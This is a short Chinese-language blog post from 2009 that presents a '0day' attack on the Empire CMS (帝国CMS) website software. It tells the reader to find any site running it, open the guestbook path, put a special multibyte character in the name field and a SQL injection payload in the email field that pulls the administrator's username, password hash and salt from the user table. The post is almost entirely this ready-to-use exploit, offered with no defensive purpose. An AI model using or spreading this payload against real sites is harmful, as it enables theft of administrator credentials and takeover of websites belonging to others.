帝国CMS网站程序0DAY-夜火博客

夜火博客 ^{个人的碎碎念收集箱}

2009年06月23日 11:12:51

帝国CMS网站程序0DAY：找到使用帝国CMS的站,网址后面直接加：

e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写：

縗

联系邮箱处写：

,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码